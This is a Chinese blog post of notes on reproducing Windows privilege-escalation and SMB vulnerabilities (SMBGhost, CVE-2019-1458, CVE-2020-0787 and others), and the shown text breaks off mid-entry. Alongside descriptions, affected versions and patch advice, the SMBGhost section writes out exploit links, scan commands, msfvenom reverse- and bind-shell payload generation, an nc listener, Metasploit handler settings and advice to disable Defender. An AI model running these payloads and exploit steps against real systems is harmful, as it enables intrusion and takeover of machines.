<!DOCTYPE html>
<html>
  
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  <meta name="author" content="Dong Yuanxin">
  
  
  <title>提权复现漏洞合集 | hcncn6</title>

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  
    <meta name="keywords" content="内网,">
  

  
  <meta name="description" content="hcncn小站">

  

  
    <script src="//cdn.jsdelivr.net/npm/leancloud-storage@3.11.1/dist/av-min.js" async></script>
  

  
    <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML" async></script>
  

  

  

  <script>
  // theme-ad's config script
  // it can be used in every script
  
  window.AD_CONFIG = {
    leancloud: {"appid":"Hyq9wkH495DgNHWhDQCOfQSp-gzGzoHsz","appkey":"WaR7nrzhliHj9aVwdQzkdlGd","comment":false,"count":true},
    welcome: {"enable":false,"interval":30},
    start_time: "2018-11-1",
    passwords: ["efe07af7441da2b69c4a41e42e73be4db47f66010a56900788a458354a7373ec", ],
    is_post: true,
    lock: false,
    author: "Dong Yuanxin",
    share: {"twitter":false,"facebook":false,"weibo":false,"qq":false,"wechat":false},
    mathjax: true,
    page_type: "",
    root: "/"
  };
</script>

  <script src="/vendor/sha256.min.js"></script>
<script src="/js/auth.js"></script>
<script src="/js/index.js"></script>
<script src="/vendor/qrcode.min.js"></script>

  
    <link rel="icon" href="/images/favicon.ico">
    <link rel="apple-touch-icon" href="/images/touch-icon.png">
  

  <link href="//netdna.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">

  <link rel="stylesheet" href="/css/index.css">
<link rel="stylesheet" href="/styles/components/highlight/highlight.css">

  
</head>
  <body>
    <header class="site-header">
  <div class="site-header-brand">
    
      <span class="site-header-brand-title">
        <a href="/">博客0v0</a>
      </span>
    
    
      <span class="site-header-brand-motto"> | 博客重建中，还有其他细节文章</span>
    
  </div>
  <div class="site-header-right">
    <nav class="site-header-navigation">
      
        <a href="/" target="_self">首页</a>
      
        <a href="/archives/" target="_self">归档</a>
      
        <a href="/categories/" target="_self">分类</a>
      
    </nav>
    <div class="site-header-btn">
      
        <a href="https://github.com/hcncn6" target="_blank" id="site-github">
          <i class="fa fa-github-alt"></i>
        </a>
      
      <a href="javascript:void(0);" id="site-search">
        <i class="fa fa-search"></i>
      </a>
      <a href="javascript:void(0);" id="site-nav-btn">
        <i class="fa fa-ellipsis-v"></i>
      </a>
    </div>
  </div>
</header>
<nav class="table-content" id="site-nav">
  <div class="table-content-title">
    <span>导航</span>
  </div>
  <div class="table-content-main">
    <ol class="toc">
      
        <li class="toc-item">
          <a href="/" target="_self">
            首页
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/archives/" target="_self">
            归档
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/categories/" target="_self">
            分类
          </a>
        </li>
      
    </ol>
  </div>
</nav>
<div id="site-process"></div>
    <main>
      
  <div class="passage">
  <div class="passage-meta">
    <span>
      <i class="fa fa-calendar"></i>2022-09-05
    </span>
    
      <span>
        | <a href="/categories/内网/"><i class="fa fa-bookmark"></i>内网</a>
      </span>
    
    
      <span>
        | <i class="fa fa-unlock-alt"></i>UNLOCK
      </span>
    
  </div>
  <h1 class="passage-title">
    提权复现漏洞合集
  </h1>
  
  <article class="passage-article">
    <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br></pre></td><td class="code"><pre><span class="line">CVE-2020-0796永恒之黑</span><br><span class="line">	原理</span><br><span class="line">		最新的windows10中使用了SMBv3协议，SMBv3协议在压缩消息时，未对头部数据做任何检查，导致恶意攻击者可以直接使用，从而导致内存破坏漏洞。</span><br><span class="line">	利用  </span><br><span class="line"></span><br><span class="line">		该漏洞可远程进行攻击目标系统，但目前只做到能是远程目标蓝屏，静等后面RCE的exp出现；</span><br><span class="line">该漏洞也可进行本地提权操作，提权成功会弹出一个system权限的终端窗口，因此最好远程桌面对目标进行提权操作。</span><br><span class="line">	影响版本</span><br><span class="line">		漏洞不影响win7，漏洞影响Windows 10 1903之后的各个32位、64位版Windows，包括家用版、专业版、企业版、教育版，具体版本号如下：</span><br><span class="line"></span><br><span class="line">		Windows 10 Version 1903 for 32-bit Systems</span><br><span class="line">Windows 10 Version 1903 for ARM64-based Systems</span><br><span class="line">Windows 10 Version 1903 for x64-based Systems</span><br><span class="line">Windows 10 Version 1909 for 32-bit Systems</span><br><span class="line">Windows 10 Version 1909 for ARM64-based Systems</span><br><span class="line">Windows 10 Version 1909 for x64-based Systems</span><br><span class="line">Windows Server, version 1903 (Server Core installation)</span><br><span class="line">Windows Server, version 1909 (Server Core installation)</span><br><span class="line">		在本地上可使用命令 ver对本机进行版本查询：</span><br><span class="line"></span><br><span class="line">	检测  </span><br><span class="line">		该漏洞利用需要目标机开启445端口。该漏洞利用需要目标机开启445端口。</span><br><span class="line">		单个目标检测：https://github.com/ollypwn/SMBGhost  </span><br><span class="line"></span><br><span class="line">		python3 scanner.py ip</span><br><span class="line">		批量检测：https://github.com/GuoKerS/aioScan_CVE-2020-0796 </span><br><span class="line">		python3 aioscan_2020_0796.py 192.168.1.1/24</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">		公开exp：https://github.com/danigargu/CVE-2020-0796</span><br><span class="line">		直接终端运行，然后输入目标ip，提权ip为本地127.0.0.1.</span><br><span class="line"></span><br><span class="line">		python3安装netaddr失败：</span><br><span class="line"></span><br><span class="line">		下载github上第三方包，然后将netaddr放入python安装目录下面的/lib/site-packages下面。</span><br><span class="line">https://github.com/netaddr/netaddr</span><br><span class="line">		利用</span><br><span class="line">			python 版本</span><br><span class="line">python 3.6 可以成功！</span><br><span class="line">python 3.7 和 2 实测蓝屏</span><br><span class="line">			需要关闭defender防火墙</span><br><span class="line"></span><br><span class="line">			payload要正向监听</span><br><span class="line"></span><br><span class="line">			systeminfo看一下补丁（KB4551762）</span><br><span class="line"></span><br><span class="line">			https://github.com/chompie1337/SMBGhost_RCE_PoC</span><br><span class="line"></span><br><span class="line">			msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b &apos;\x00&apos; -i 1 -f python ？？</span><br><span class="line">			msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.104 LPORT=1443 -f py -o test.py</span><br><span class="line"></span><br><span class="line">			 nc -lvvp 1443 成功</span><br><span class="line"></span><br><span class="line">			用miasm将shellcode转换成汇编：</span><br><span class="line"></span><br><span class="line">			把buf 替换成USER_PAYLOAD</span><br><span class="line"></span><br><span class="line">			use exploit/multi/handler </span><br><span class="line">set payload windows/x64/meterpreter/bind_tcp</span><br><span class="line">set lport 6666</span><br><span class="line">set rhost 192.168.31.235</span><br><span class="line">run</span><br><span class="line">			python3 exploit.py -ip 192.168.100.54</span><br><span class="line">			本地提权</span><br><span class="line">				提权POC</span><br><span class="line">https://github.com/ZecOps/CVE-2020-0796-LPE-POC</span><br><span class="line">已编译EXP</span><br><span class="line">https://github.com/f1tz/CVE-2020-0796-LPE-EXP</span><br><span class="line">要跑这个程序肯定要先把Windows自带的Defender关掉</span><br><span class="line"></span><br><span class="line">	修复建议</span><br><span class="line">		（参考微软官方建议，https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0796）</span><br><span class="line">		1.更新系统</span><br><span class="line">这肯定是最常见也是最简单有效的方法了</span><br><span class="line">2.禁用 SMBv3 压缩</span><br><span class="line">可以使用以下 PowerShell 命令禁用压缩功能，以阻止未经身份验证的攻击者利用SMBv3 服务器的漏洞。</span><br><span class="line">Set-ItemProperty -Path &quot;HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters&quot; DisableCompression -Type DWORD -Value 1 -Force</span><br><span class="line">注意：</span><br><span class="line">进行更改后，无需重启</span><br><span class="line">此解决方法不能阻止利用 SMB 客户端；尝试第二种方法以保护客户端</span><br><span class="line">Windows 或 Windows Server 尚未使用 SMB 压缩，并且禁用 SMB 压缩不会产生负面的性能影响</span><br><span class="line">可以使用下面的 PowerShell 命令禁用该功能</span><br><span class="line">Set-ItemProperty -Path &quot;HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters&quot; DisableCompression -Type DWORD -Value 0 -Force</span><br><span class="line">注意： 禁用此功能后，无需重启。</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">CVE-2020-1054</span><br><span class="line">	子主题</span><br><span class="line">		https://www.cnblogs.com/DreamoneOnly/p/13207943.html</span><br><span class="line">	子主题</span><br><span class="line">CVE-2019-1458</span><br><span class="line">	漏洞简介</span><br><span class="line">		CVE-2019-1458是Win32k中的特权提升漏洞，Win32k组件无法正确处理内存中的对象时，导致Windows中存在一个特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。然后攻击者可能会安装程序、查看、更改或删除数据；或创建具有完全用户权限的新帐户。</span><br><span class="line">	影响版本</span><br><span class="line">		Microsoft Windows 10 Version 1607 for 32-bit Systems</span><br><span class="line">Microsoft Windows 10 Version 1607 for x64-based Systems</span><br><span class="line">Microsoft Windows 10 for 32-bit Systems</span><br><span class="line">Microsoft Windows 10 for x64-based Systems</span><br><span class="line">Microsoft Windows 7 for 32-bit Systems SP1</span><br><span class="line">Microsoft Windows 7 for x64-based Systems SP1</span><br><span class="line">Microsoft Windows 8.1 for 32-bit Systems</span><br><span class="line">Microsoft Windows 8.1 for x64-based Systems</span><br><span class="line">Microsoft Windows RT 8.1</span><br><span class="line">Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1</span><br><span class="line">Microsoft Windows Server 2008 R2 for x64-based Systems SP1</span><br><span class="line">Microsoft Windows Server 2008 for 32-bit Systems SP2</span><br><span class="line">Microsoft Windows Server 2008 for Itanium-based Systems SP2</span><br><span class="line">Microsoft Windows Server 2008 for x64-based Systems SP2</span><br><span class="line">Microsoft Windows Server 2012</span><br><span class="line">Microsoft Windows Server 2012 R2</span><br><span class="line">Microsoft Windows Server 2016</span><br><span class="line">————————————————</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	修复补丁</span><br><span class="line">		https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458</span><br><span class="line"></span><br><span class="line">	利用方式</span><br><span class="line"></span><br><span class="line">		https://github.com/piotrflorczyk/cve-2019-1458_POC</span><br><span class="line"></span><br><span class="line">		https://github.com/unamer/CVE-2019-1458</span><br><span class="line"></span><br><span class="line">			漏洞利用后重新启动系统时内核可能会崩溃</span><br><span class="line">			- VS2019（V120）X64 Release</span><br><span class="line">编译好的文件</span><br><span class="line">cve-2019-1458.exe</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line">CVE-2020-0787</span><br><span class="line">	描述</span><br><span class="line">	当Windows背景智能传输服务(BITS)没有正确处理符号链接时，存在特权提升漏洞。成功利用此漏洞的攻击者可以改写目标文件，从而提升权限。要利用这个漏洞，攻击者首先必须登录系统，攻击者可以运行EXP，利用该漏洞来提权进而完全控制受影响的系统。漏洞爆出后的安全更新通过纠正Windows BITS处理符号链接的方式修复了这个漏洞。</span><br><span class="line"></span><br><span class="line">	影响版本</span><br><span class="line">		Windows 10 Version 1809 for ARM64-based Systems</span><br><span class="line">Windows Server 2008 for 32-bit Systems Service Pack 2</span><br><span class="line">Windows RT 8.1</span><br><span class="line">Windows 8.1 for x64-based systems</span><br><span class="line">Windows 8.1 for 32-bit systems</span><br><span class="line">Windows 7 for x64-based Systems Service Pack 1</span><br><span class="line">Windows 7 for 32-bit Systems Service Pack 1</span><br><span class="line">Windows Server 2016 (Server Core installation)</span><br><span class="line">Windows Server 2016</span><br><span class="line">Windows 10 Version 1607 for x64-based Systems</span><br><span class="line">Windows 10 Version 1607 for 32-bit Systems</span><br><span class="line">Windows 10 for x64-based Systems</span><br><span class="line">Windows 10 for 32-bit Systems</span><br><span class="line">Windows Server, version 1903 (Server Core installation)</span><br><span class="line">Windows 10 Version 1903 for ARM64-based Systems</span><br><span class="line">Windows 10 Version 1903 for x64-based Systems</span><br><span class="line">Windows 10 Version 1903 for 32-bit Systems</span><br><span class="line">Windows 10 Version 1709 for ARM64-based Systems</span><br><span class="line">Windows 10 Version 1709 for x64-based Systems</span><br><span class="line">Windows 10 Version 1709 for 32-bit Systems</span><br><span class="line">Windows Server, version 1909 (Server Core installation)</span><br><span class="line">Windows 10 Version 1909 for ARM64-based Systems</span><br><span class="line">Windows 10 Version 1909 for x64-based Systems</span><br><span class="line">Windows 10 Version 1909 for 32-bit Systems</span><br><span class="line">Windows Server 2019 (Server Core installation)</span><br><span class="line">Windows Server 2019</span><br><span class="line">Windows Server 2012 R2 (Server Core installation)</span><br><span class="line">Windows Server 2012 R2</span><br><span class="line">Windows Server 2012 (Server Core installation)</span><br><span class="line">Windows Server 2012</span><br><span class="line">Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</span><br><span class="line">Windows Server 2008 R2 for x64-based Systems Service Pack 1</span><br><span class="line">Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</span><br><span class="line">Windows Server 2008 for x64-based Systems Service Pack 2</span><br><span class="line">Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</span><br><span class="line">Windows 10 Version 1809 for x64-based Systems</span><br><span class="line">Windows 10 Version 1809 for 32-bit Systems</span><br><span class="line">Windows 10 Version 1803 for ARM64-based Systems</span><br><span class="line">Windows Server, version 1803 (Server Core Installation)</span><br><span class="line">Windows 10 Version 1803 for x64-based Systems</span><br><span class="line">Windows 10 Version 1803 for 32-bit Systems</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	利用</span><br><span class="line">		https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION</span><br><span class="line"></span><br><span class="line">		原版用法</span><br><span class="line">直接运行会弹出SYSTEM权限CMD框，只有Shell的情况下就不好玩了。</span><br><span class="line">	 修复建议</span><br><span class="line">		1）根据自己的系统版本打上相应的单独的SSU补丁：http://www.catalog.update.microsoft.com/home.aspx</span><br><span class="line">2）使用Windows更新进行系统安全更新，将自动打上相应安全补丁</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br><span class="line">325</span><br><span class="line">326</span><br><span class="line">327</span><br><span class="line">328</span><br><span class="line">329</span><br><span class="line">330</span><br><span class="line">331</span><br><span class="line">332</span><br><span class="line">333</span><br><span class="line">334</span><br><span class="line">335</span><br><span class="line">336</span><br><span class="line">337</span><br><span class="line">338</span><br><span class="line">339</span><br><span class="line">340</span><br><span class="line">341</span><br><span class="line">342</span><br><span class="line">343</span><br><span class="line">344</span><br><span class="line">345</span><br><span class="line">346</span><br><span class="line">347</span><br><span class="line">348</span><br><span class="line">349</span><br><span class="line">350</span><br><span class="line">351</span><br><span class="line">352</span><br><span class="line">353</span><br><span class="line">354</span><br><span class="line">355</span><br><span class="line">356</span><br><span class="line">357</span><br><span class="line">358</span><br><span class="line">359</span><br><span class="line">360</span><br><span class="line">361</span><br><span class="line">362</span><br><span class="line">363</span><br><span class="line">364</span><br><span class="line">365</span><br><span class="line">366</span><br><span class="line">367</span><br><span class="line">368</span><br><span class="line">369</span><br><span class="line">370</span><br><span class="line">371</span><br><span class="line">372</span><br><span class="line">373</span><br><span class="line">374</span><br><span class="line">375</span><br><span class="line">376</span><br><span class="line">377</span><br><span class="line">378</span><br><span class="line">379</span><br><span class="line">380</span><br><span class="line">381</span><br><span class="line">382</span><br><span class="line">383</span><br><span class="line">384</span><br><span class="line">385</span><br><span class="line">386</span><br><span class="line">387</span><br><span class="line">388</span><br><span class="line">389</span><br><span class="line">390</span><br><span class="line">391</span><br><span class="line">392</span><br><span class="line">393</span><br><span class="line">394</span><br><span class="line">395</span><br><span class="line">396</span><br><span class="line">397</span><br><span class="line">398</span><br><span class="line">399</span><br><span class="line">400</span><br><span class="line">401</span><br><span class="line">402</span><br><span class="line">403</span><br><span class="line">404</span><br><span class="line">405</span><br><span class="line">406</span><br><span class="line">407</span><br><span class="line">408</span><br><span class="line">409</span><br><span class="line">410</span><br><span class="line">411</span><br><span class="line">412</span><br><span class="line">413</span><br><span class="line">414</span><br><span class="line">415</span><br><span class="line">416</span><br><span class="line">417</span><br><span class="line">418</span><br><span class="line">419</span><br><span class="line">420</span><br><span class="line">421</span><br><span class="line">422</span><br><span class="line">423</span><br><span class="line">424</span><br><span class="line">425</span><br><span class="line">426</span><br><span class="line">427</span><br><span class="line">428</span><br><span class="line">429</span><br><span class="line">430</span><br><span class="line">431</span><br><span class="line">432</span><br><span class="line">433</span><br><span class="line">434</span><br><span class="line">435</span><br><span class="line">436</span><br><span class="line">437</span><br><span class="line">438</span><br><span class="line">439</span><br><span class="line">440</span><br><span class="line">441</span><br><span class="line">442</span><br><span class="line">443</span><br><span class="line">444</span><br><span class="line">445</span><br><span class="line">446</span><br><span class="line">447</span><br><span class="line">448</span><br><span class="line">449</span><br><span class="line">450</span><br><span class="line">451</span><br><span class="line">452</span><br><span class="line">453</span><br><span class="line">454</span><br><span class="line">455</span><br><span class="line">456</span><br><span class="line">457</span><br><span class="line">458</span><br><span class="line">459</span><br><span class="line">460</span><br><span class="line">461</span><br><span class="line">462</span><br><span class="line">463</span><br><span class="line">464</span><br><span class="line">465</span><br><span class="line">466</span><br><span class="line">467</span><br><span class="line">468</span><br><span class="line">469</span><br><span class="line">470</span><br><span class="line">471</span><br><span class="line">472</span><br><span class="line">473</span><br><span class="line">474</span><br><span class="line">475</span><br><span class="line">476</span><br><span class="line">477</span><br><span class="line">478</span><br><span class="line">479</span><br><span class="line">480</span><br><span class="line">481</span><br><span class="line">482</span><br><span class="line">483</span><br><span class="line">484</span><br><span class="line">485</span><br><span class="line">486</span><br><span class="line">487</span><br><span class="line">488</span><br><span class="line">489</span><br><span class="line">490</span><br><span class="line">491</span><br><span class="line">492</span><br><span class="line">493</span><br><span class="line">494</span><br><span class="line">495</span><br><span class="line">496</span><br><span class="line">497</span><br><span class="line">498</span><br><span class="line">499</span><br><span class="line">500</span><br><span class="line">501</span><br><span class="line">502</span><br><span class="line">503</span><br><span class="line">504</span><br><span class="line">505</span><br><span class="line">506</span><br><span class="line">507</span><br><span class="line">508</span><br><span class="line">509</span><br><span class="line">510</span><br><span class="line">511</span><br><span class="line">512</span><br><span class="line">513</span><br><span class="line">514</span><br><span class="line">515</span><br><span class="line">516</span><br><span class="line">517</span><br><span class="line">518</span><br><span class="line">519</span><br><span class="line">520</span><br></pre></td><td class="code"><pre><span class="line">CVE-2019-1388 </span><br><span class="line">	描述</span><br><span class="line"></span><br><span class="line">		该漏洞位于Windows的UAC（User Account 